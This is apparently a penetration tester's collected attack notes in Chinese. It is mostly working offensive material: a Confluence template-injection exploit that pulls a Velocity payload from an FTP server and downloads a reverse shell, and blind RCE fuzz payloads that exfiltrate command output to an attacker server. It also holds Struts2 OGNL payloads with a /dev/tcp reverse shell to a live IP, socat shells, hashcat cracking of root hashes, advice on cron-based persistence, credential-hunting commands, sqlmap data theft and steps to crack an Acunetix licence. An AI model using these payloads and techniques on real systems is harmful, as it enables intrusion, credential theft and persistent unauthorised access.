{"code":null,"msg":null,"data":{"cause":null,"stackTrace":[{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"parse","fileName":"InternetAddress.java","lineNumber":696,"nativeMethod":false,"className":"javax.mail.internet.InternetAddress"},{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"parse","fileName":"InternetAddress.java","lineNumber":655,"nativeMethod":false,"className":
···
···
···
methodName":"run","fileName":"Thread.java","lineNumber":830,"nativeMethod":false,"className":"java.lang.Thread"}],"message":null,"suppressed":[],"localizedMessage":null}}
文件读取:
url:/confluence/rest/tinymce/1/macro/preview
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../../../../../etc/passwd"}}}
生成cmd.vm文件放在自己的服务器上。
cat cmd.vm
#set ($e="exp")
#set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd))
#set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a))
#set($sc = $e.getClass().forName("java.util.Scanner"))
#set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream")))
#set($scan=$constructor.newInstance($input).useDelimiter("\\A"))
#if($scan.hasNext())
$scan.next()
#end
这个漏洞是相当于一个远程文件包含的原理,所以下面跑一个ftp然后在post包里包含,最后输出cmd执行命令即可。
python3 -m pyftpdlib -p 2121
[I 2020-07-23 15:47:58] concurrency model: async
[I 2020-07-23 15:47:58] masquerade (NAT) address: None
[I 2020-07-23 15:47:58] passive ports: None
[I 2020-07-23 15:47:58] >>> starting FTP server on 0.0.0.0:2121, pid=25460 <<<
执行命令:
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"ftp://www.chihou.pro:2121/cmd.vm","cmd":"whoami"}}}
下载shell反弹:
{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"ftp://www.chihou.pro:2121/cmd.vm","cmd":"curl -o /tmp/nc.py ftp://www.chihou.pro:2121/nc.py"}}}
"python /tmp/nc.py"
此处仅仅对于aq工具的报错进行部分记录,若存在无法解决的问题可以自行查询其他师傅的文章。
gem sources --add https://gems.ruby-china.com/ --remove https://rubygems.org/
npm config set registry https://registry.npm.taobao.org
gem install aquatone && npm install electron && npm install nightmare
Building native extensions. This could take a while...
ERROR: Error installing aquatone:
ERROR: Failed to build gem native extension.
current directory: /var/lib/gems/2.7.0/gems/ffi-1.13.1/ext/ffi_c
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20200713-12887-ohoa28.rb extconf.rb
mkmf.rb can't find header files for ruby at /usr/lib/ruby/include/ruby.h
You might have to install separate package for the ruby development
environment, ruby-dev or ruby-devel for example.
报什么依赖的错就安装上什么依赖,上面报的错单独拿下来,看到如下得报错。
$ sudo apt install ruby-devel
把依赖安装上就可以了
然后重新执行:
Building native extensions. This could take a while...
Successfully installed ffi-1.13.1
Successfully installed childprocess-0.7.1
Successfully installed multi_xml-0.6.0
When you HTTParty, you must party hard!
Successfully installed httparty-0.14.0
Successfully installed aquatone-0.5.0
Parsing documentation for ffi-1.13.1
Installing ri documentation for ffi-1.13.1
Parsing documentation for childprocess-0.7.1
Installing ri documentation for childprocess-0.7.1
Parsing documentation for multi_xml-0.6.0
Installing ri documentation for multi_xml-0.6.0
Parsing documentation for httparty-0.14.0
Installing ri documentation for httparty-0.14.0
Parsing documentation for aquatone-0.5.0
Installing ri documentation for aquatone-0.5.0
Done installing documentation for ffi, childprocess, multi_xml, httparty, aquatone after 6 seconds
?
+———————————————+
|export LC_ALL=C|
+———————————————+
npm install -g electron --registry=https://registry.npm.taobao.org
DEBUG=nightmare xvfb-run aquatone-gather -d ksyun.com --threads 10
npm install --save nightmare --unsafe-perm=true --allow-root --registry=https://registry.npm.taobao.org
https://gh0st.cn/archives/2018-09-02/1
nightmare同时这里aq存在一个问题,如果执行aq-gather报错那么就执行如下,就是下载一个shell脚本输出到bin文件夹下执行。
wget "https://gist.githubusercontent.com/random-robbie/beae1991e9ad139c6168c385d8a31f7d/raw/aq.sh" -O /bin/aq && chmod 777 /bin/aq
然后直接aq执行就可以。
goroutine 6807 [running]:
runtime.throw(0x14dee2a, 0x21)
指定参数threads和time:降低线程数和增大超时时间,这里可以自行查看一下线程数的指定参数和timeout的指定格式。
为了保护原始license不失效,这里尽快执行如下的命令,不然license会被修改然后就无法破解成功。
root@kali:~# chattr +i /home/acunetix/.acunetix_trial/data/license/license_info.json
root@kali:~# rm -fr /home/acunetix/.acunetix_trial/data/license/wa_data.dat
root@kali:~# touch /home/acunetix/.acunetix_trial/data/license/wa_data.dat
root@kali:~# chattr +i /home/acunetix/.acunetix_trial/data/license/wa_data.dat
docker镜像下载的命令可以参考国光师傅的博客。
写在文前:
我们在web攻防期间有很多时候有一种感觉:那就是遇到rce漏洞时,bp放包的时候有一种隐隐的感觉,有的时候bp的反包字节大小莫名其妙的怪异,有经验的老师傅就索性直接跑RCE的fuzz字典,所以本篇就日常记录一些有关于web攻防期间的一些fuzz技巧
即我们可以在关键参数后面使用管道符号和连接符fuzz命令执行实现我们的盲打:
||和&
同上
||和&
${IFS},$IFS,$IFS$9
\u000awget\u0020 http://ip
Linux下可以包括反引号,windows下不可以。
服务器启动web,注意需要处于监听状态下启动:
bin4xin@bin4xin's MacbookPro tools % python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
rce fuzz命令如下:
bin4xin@bin4xin's MacbookPro tools % curl 192.168.101.51:8000/`whoami`
同时我们反过来看web日志记录:
::ffff:192.168.101.51 - - [19/Sep/2020 13:57:25] "GET /bin4xin HTTP/1.1" 301 -
同理各位可以发散思维:
ping whoami.服务器地址
如上,ping、curl同样适用。
一些特殊字符绕过姿势:
curl http://服务器地址/$(whoami)
curl http://服务器地址/$(whoami|base64)
'w'g'e't${IFS}服务器地址
各位可以自行实验在linux下的效果。
fuzz技巧是一样的,只是fuzz命令有一些区别;
ping %USERNAME%.服务器地址
------
(获取计算机名)
for /F %x in ('whoami') do start http://服务器地址/%x
------
(获取用户名称)
for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.服务器地址
------
测试邮箱:`wget%209服务器地址/xxxx`@qq.com
测试上传:`sleep 10`filename
测试filenname:`||wget%20服务器地址`
测试上传处下的名称: ;payload|payload&payload
;whoami|whoami&whoami
------
浏览器[Chrome,Firefox,Edge,IE,360,QQ ]信息(历史记录,密码,书签,cookie):
%LocalAppData%\Google\Chrome\User Data\Default
%APPDATA%\Mozilla\Firefox\Profiles\xxxxxxxx.default\
机器内敏感文件,关键词:账号、密码、备份、登录、管理、邮箱、后台、资产、网络
for /r D:\ %i in (*密码*) do @echo %i
for /r D:\ %i in (*vpn*) do @echo %i
for /r D:\ %i in (*账号*) do @echo %i
机器进程
安装软件列表
当前windows 凭证管理器存储的密码
登录密码(mimikatz)
wifi密码
outlook密码
……
机器开放端口信息/防火墙信息/获取机器共享
netstat -naop
wmic share get name,path,status #利用wmic查找共享
获取机器所有rdp连接记录
获取所有盘符
wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,volumeserialnumber,size #查看分区
获取全盘所有敏感文件
.doc\xlsx\md\sql\ppt*\txt
for /r D:\ %i in (*.doc) do @echo %i
for /r D:\ %i in (*.xlsx) do @echo %i
for /r D:\ %i in (*.ppt*)) do @echo %i
本地环境
工作不饱和 总结了一下个人办公机信息收集思路
经历过几次HW行动,每次HW都运气较好可以拿到服务器,于是每次公司的内网渗透的任务就交给我,记录一下对于内网的信息搜集过程,以及在此过程中我自己所积累的小技巧。
一般来说通过shiro和struts2拿到的shell基本都是root,很多人都会直接去读取passwd文件,其实并不可取。下面展示一下2核4G服务器跑hash文件的过程。一般是跑不出来的,hash过程较难逆,除非存在彩虹表,一般都跑不出来。
hashcat -m 1800 -a 0 -o found.txt linux-root.txt /usr/share/john/password.lst --force
hashcat (v4.0.1) starting...
OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz, 256/738 MB allocatable, 1MCU
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Uses-64-Bit
Password length minimum: 0
Password length maximum: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.
* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'
* Device #1: Kernel m01800.8f866878.kernel not found in cache! Building may take a while...
继续 :(
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => Dictionary cache built:
* Filename..: /usr/share/john/password.lst
* Passwords.: 3559
* Bytes.....: 26325
* Keyspace..: 3559
* Runtime...: 0 secs
- Device #1: autotuned kernel-accel to 128
- Device #1: autotuned kernel-loops to 128
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => [s]tatus [p]ause [r]esume [b]ypass [c]heckpoApproaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: linux-root.txt
Time.Started.....: Mon Jun 8 11:29:25 2020 (23 secs)
Time.Estimated...: Mon Jun 8 11:29:48 2020 (0 secs)
Guess.Base.......: File (/usr/share/john/password.lst)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 311 H/s (8.82ms)
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 7118/7118 (100.00%)
Rejected.........: 0/7118 (0.00%)
Restore.Point....: 3559/3559 (100.00%)
Candidates.#1....: doom2 -> sss
HWMon.Dev.#1.....: N/A
Started: Mon Jun 8 11:28:50 2020
Stopped: Mon Jun 8 11:29:49 2020
一般建议可以以root用户新建用户来维持权限,或者是写入corntab计划来定时反弹shell。实操中几乎很少有运维、开发去检查定时计划的反弹shell脚本,所以基本上可以满足后持续渗透的条件。
数据库配置信息 通过mybatis等配置文件就可以拿到内网中对应的数据库机器,一般都是低权限,运气好可以拿到高权限。运气再好一点存在高权限的mssql数据库可以尝试连接一下尝试xp_cmd_shell来执行命令。
有的时候拿到的机器或多或少存在一些特殊情况,比如docker机器、单纯的一个数据库机器,那么就尽力而为去做一些搜集工作,特别是docker机器,除了跑的服务,机器里面太干净了,基本没有什么可以利用的地方。
在当前目录下搜索存在字符为'mysql'的文件 grep -rn "mysql" . ======= 查看对应系统的敏感配置文件 cat static/scripts/tinymce/js/tinymce/plugins/jbimages/ci/application/config/database.php ======= curl ifconfig.me 120.25.13.49
我们通过web层面拿到的机器,一般都是web服务器,即存在各种jar包,所以服务器里会存放大量配置文件
ps -ef|grep java
netstat -ANTUP
通过进程任务可以查找到部署jar包的目录和相对应依赖,大部分运维和开发都习惯于在根目录下新建data目录或者是非系统文件夹下的目录存在web的依赖jar包,我们就可以从这点做突破口。查看一下端口开放情况和对应的目录位置,有一些shell的基础就可以搜集到这些信息。
命令执行历史文件一般建议必看,里面会存着一些意想不到的内容,下面截取一小部分我在内网实战中发现的惊喜:
su root
crontab -e
su rppt
su root
crontab -e
crontab -l
ll
cd domain/
ll
cd nexus3/
ll
cd nexus-3.12.0-01
ll
cd bin/
./nexus start
pactera@575
cd domain/
ll
cd nexus3/
注意./nexus start和cd domain/两条命令中间的那个“命令”,对,没错那个是sudoer用户的密码,su切换直接就拥有root权限。我们分析一下为什么出现这样的现象:个人认为是在运行nexus程序是需要密码来提升权限,然后输入者在等待过程中没有发现输入密码的shell还没有回显出来就输入了密码,从而导致密码被系统当作执行命令记录进了history文件。
发现这个后,我第一时间去看了自己服务器和自己的mac本上的历史文件,搜索机器密码关键词,同时也存在这样的现象明文密码存在了里面
醍醐灌顶
总结下来,内网的信息收集需要的是细心。
在写之前我们需要明确一点,就是我们所需要的内网目标是什么? 而内网穿透和内网代理的分别在哪里? 在什么情况我们需要做内网穿透,什么时候我们需要做内网代理?
python3 reGeorgSocksProxy.py -p 9999 -l 0.0.0.0 -u https://www.pgyer.com/tunnel.nosocket.php
内网穿透就是针对一个机器下的某一个特定端口,通过流量转发的形式把端口暴露在公网上,举个例子,我们拿下了一个linux机器,很巧这个机器是运维机器,我们发现了大量的运维账号密码。 又然后,发现windows的远程登录服务即3389端口,所以我们在这个时候可以使用端口服务转发的技巧,把端口流量转发到一个我们可控公网的端口上(如33890),那么我们在对我们自己可控公网的端口上进行数据请求的时候,就是在对这个windows机器的数据请求,所以我们可以很轻松的使用我们的到的账号和密码来连接对应的windows机器。
所以我们做内网穿透的最终目的,很显然是: 我们在已知某个内网服务器的敏感信息(如3389远程连接账号密码、3306连接账号密码),而我们在内网又无法使用windows机器远程连接、mysql-client软件对我们所得到的信息进行明确验证时,那么这个时候我们可以使用内网穿透即流量转发的手段来进行进一步验证。
内网代理,顾名思义就是我们自己可控的本机,通过各种代理方法(s5、s4),把拿下的内网服务器当作流量转发的一个中间跳板,对内网进行一系列我们想做的事情。这种情况下,我们的代理机器在内网没有具体的一个身份,只是我们通过代理的方式把我们对内网所发出的流量通过内网可控服务器向内网进行请求。
极力推荐。挂了代理就已经进入了内网,十分方便。只需要配置vps(frps)端,拿下shell后下载frpc客户端,启动服务就可以。 windows:proxifier linux:frpc
没用过,听过。
网上有很多关于vulhub的docker构建教程,就不重复造轮子了。记录一些日常使用dokcer遇到的问题
Burp Suite Professional Error Connection reset 当前无法使用此页面 当前无法处理此请求。HTTP ERROR 503
之前做一个struts2/s2-057的漏洞复现,因为是自己的服务器就各种造,扫描器什么的一把梭。最后靶场被玩儿坏了。尝试能不能重装镜像解决:( 这里我随便拿了一个镜像举列子
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
xdebug-rce_php latest 6026f10530db 3 days ago 393MB
vulhub/php 7.1.12-apache 10fffe5b286c 2 years ago 392MB
vulhub/tomcat 8.5 66ba03f6c1d8 3 years ago 367MB
vulhub/tomcat 8.0 458575a05d97 3 years ago 357MB
docker rmi 6026f10530db
Untagged: xdebug-rce_php:latest
Deleted: sha256:6026f10530db39c61d31e0461ccbff4786e8c604c34f8ff8167d7ac89c81446a
Deleted: sha256:4ce36271980f0f494e1a935bdaced37ea38d08fb167d54c50440fc009df315f9
Deleted: sha256:d43d3fbbbb36edd2dbedd5df458789c7c57b5fd366403830bb6ac01b42b743d7
Deleted: sha256:b15d563c13eccd51017c2bfa269f322744cb476c4c62749d5356cd0069d6391d
如果报错提示无法删除,大概率情况下是指定删除的镜像docker内在运行,直接停止就行。
docker rm 6026f10530db:删除已停止的容器
docker rm -f 6026f10530db:删除正在运行的容器
重要的是CONTAINER ID值,执行docker ps查看就可以:
sudo docker exec -it 775c7c9ee1e1 /bin/bash
go install: no install location for directory outside GOPATH:
参考: https://stackoverflow.com/questions/26134975/go-install-no-install-location-for-directory-outside-gopath
进入容器后就可以直接执行命令,ifconfig:
br-4c7c2091db92: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.24.0.1 netmask 255.255.0.0 broadcast 172.24.255.255
inet6 fe80::42:b7ff:feb7:f51d prefixlen 64 scopeid 0x20<link>
ether 02:42:b7:b7:f5:1d txqueuelen 0 (Ethernet)
RX packets 46 bytes 4538 (4.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 65 bytes 4778 (4.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
inet6 fe80::42:94ff:feb9:c3dc prefixlen 64 scopeid 0x20<link>
ether 02:42:94:b9:c3:dc txqueuelen 0 (Ethernet)
RX packets 1602494 bytes 995390708 (949.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1434833 bytes 872808706 (832.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.17.185.134 netmask 255.255.240.0 broadcast 172.17.191.255
inet6 fe80::216:3eff:fe03:a170 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:03:a1:70 txqueuelen 1000 (Ethernet)
RX packets 6405140 bytes 5419609300 (5.0 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4733596 bytes 1372915223 (1.2 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 20372 bytes 1792815 (1.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 20372 bytes 1792815 (1.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth382577a: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::b067:b9ff:fece:612b prefixlen 64 scopeid 0x20<link>
ether b2:67:b9:ce:61:2b txqueuelen 0 (Ethernet)
RX packets 46 bytes 5182 (5.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 83 bytes 6263 (6.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
iptable:
iptables -L
# Warning: iptables-legacy tables present, use iptables-legacy to see them
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
DOCKER-USER all -- anywhere anywhere
DOCKER-ISOLATION-STAGE-1 all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED
DOCKER all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere ctstate RELATED,ESTABLISHED
DOCKER all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
ACCEPT all -- anywhere anywhere
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain DOCKER (2 references)
target prot opt source destination
ACCEPT tcp -- anywhere 172.24.0.2 tcp dpt:http-alt
Chain DOCKER-ISOLATION-STAGE-1 (1 references)
target prot opt source destination
DOCKER-ISOLATION-STAGE-2 all -- anywhere anywhere
DOCKER-ISOLATION-STAGE-2 all -- anywhere anywhere
RETURN all -- anywhere anywhere
Chain DOCKER-USER (1 references)
target prot opt source destination
RETURN all -- anywhere anywhere
Chain DOCKER-ISOLATION-STAGE-2 (2 references)
target prot opt source destination
DROP all -- anywhere anywhere
DROP all -- anywhere anywhere
RETURN all -- anywhere anywhere
struts2-001该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。
例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。
影响版本:Struts 2.0.0 - Struts 2.0.8
%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
发送回包回显如下:payload的注入命令whoami下方页面显示回显root,执行成功。
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<p>link: <a href="https://struts.apache.org/docs/s2-001.html">https://struts.apache.org/docs/s2-001.html</a></p>
<form id="login" name="login" onsubmit="return true;" action="/login.action" method="post">
<table class="wwFormTable">
<tr>
<td class="tdLabel"><label for="login_username" class="label">username:</label></td>
<td
><input type="text" name="username" value="asdadas" id="login_username"/>
</td>
</tr>
root
payload1:
%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22whoami%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
payload2(get shell):
%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ping","dnslog.cn"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c","/bin/bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
--------------------+
--------------------+
以下是使用payload,实测能够十分有效的进行各种poc代码注入,使用url编码效果更佳。
%25{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"/bin/bash","-c","/bin/bash -i >& /dev/tcp/47.52.233.92/12341 0>& 1"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
nc -lvnp 12341
Listening on 0.0.0.0 12341
Connection received on 120.242.209.224 17321
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@9485ca31e963:/usr/local/tomcat# id
uid=0(root) gid=0(root) groups=0(root)
?url=%24%7B%28%23_memberAccess%5B"allowStaticMethodAccess"%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read%28%23d%29%2C%23out%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23out.println%28%23d%29%2C%23out.close%28%29%29%7D
debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2c%23b%3dnew java.io.InputStreamReader%28%23a%29%2c%23c%3dnew java.io.BufferedReader%28%23b%29%2c%23d%3dnew char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29
影响版本: <= Struts 2.3.34, Struts 2.5.16
访问http://localhost:8080/${(111+111)}/actionChain1.action
Requst包
GET /$%7B(111+111)%7D/actionChain1.action HTTP/1.1
Host: vuln_s2_ip:8080
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/ap
ng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=6567848243F5C10BA42DA6C8222FFC32
Connection: close
+------------------------++------------------------++------------------------+
+------------------------++------------------------++------------------------+
Response包:
HTTP/1.1 302
Location: /222/register2.action
Content-Length: 0
Date: Wed, 27 May 2020 06:21:06 GMT
Connection: close
我们看到${(111+111)}表达式已经被计算
写在前面,本方法适用于在反弹shell后把shell提升为完全交互式shell,也是自己实战了一段时间后摸索出来的,记一下笔记;
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
reset
export SHELL=bash
//$ export TERM=xterm-256color
同样的,我在网上也找到另外一种方式:script /dev/null/这样:同理,也可以通过同样的方式获取到交互式shell:
script /dev/null
Ctrl-Z
stty raw -echo
fg
reset
这样我们在终端某个命令时,输入ctrl+c或者ctrl+z就不会直接中断shell。
这里转载搜到信息来进行展示,供大家参考:
stty -echo #禁止回显,当在键盘上输入时,并不出现在屏幕上
stty echo #打开回显
stty raw #设置原始输入
stty -raw #关闭原始输入
bg #将一个在后台暂停的命令,变成继续执行
fg #将后台中的命令调至前台继续运行
jobs #查看当前有多少在后台运行的命令
ctrl+z #可以将一个正在前台执行的命令放到后台,并且暂停
clear #这个命令将会刷新屏幕,本质上只是让终端显示页向后翻了一页,如果向上滚动屏幕还可以看到之前的操作信息。
reset #这个命令将完全刷新终端屏幕,之前的终端输入操作信息将都会被清空
目标机
把socat上传到目标机器上或者直接下载
$ wget https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat
vuln_ip:
chmod +x /tmp/socat
./tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:47.52.233.92:4444
--
attack machine
socat file:`tty`,raw,echo=0 tcp-listen:4444
有的时候终端写入的命令太长,而终端行列不够长来显示所以会导致命令重叠、错杂,我们可以用下面的方法来让我们用这个shell用的更舒服点;
先看看自己机器上的stty配置信息:
root@ubuntu20-free:~# stty -a
speed 9600 baud; rows 35; columns 148; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
speed 9600 baud; rows 35; columns 148; line = 0;这一段是我们所需要的信息;
rows 35; columns 148
配置我们的shell如下:
$ stty rows 35 cols 148
有的时候感觉terminal上太多命令了,用着用着会习惯性输入命令clear,然后你们就会看到如下现象:
# clear
TERM environment variable not set.
# set |grep TERM
TERM=dumb
如上,看term的配置信息,最后解决办法如下,设置term为xterm就可以了。
# export TERM=xterm
# set |grep TERM
TERM=xterm
_=TERM
之后就可以随意的clear清除命令辣!
sqlmap -r Desktop/uid.txt --current-user
sqlmap -r Desktop/uid.txt -D aiweb1 --tables
sqlmap -r Desktop/uid.txt -D aiweb1 -T systemUser --columns
sqlmap -r Desktop/uid.txt -D aiweb1 -T systemUser -C id,password,userName
sqlmap -r Desktop/uid.txt --file-read="/etc/passwd"
sql-shell> select load_file('/etc/passwd')
查看数据库信息和系统版本
sql-shell> select @@version
[14:29:22] [INFO] fetching SQL SELECT statement query output: 'select @@version'
select @@version: 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) \n\tApr 2 2010 15:48:46 \n\tCopyright (c) Microsoft Corporation\n\tStandard Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)\n'
验证是否为sa权限
sql-shell> select IS_SRVROLEMEMBER('sysadmin')
[14:30:08] [INFO] fetching SQL SELECT statement query output: 'select IS_SRVROLEMEMBER('sysadmin')'
select IS_SRVROLEMEMBER('sysadmin'): '1'
判断目标机的MSSQL服务是否存在`xp_cmdshell`扩展存储过程:
sql-shell> select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';
[14:31:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell''
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';: '1'
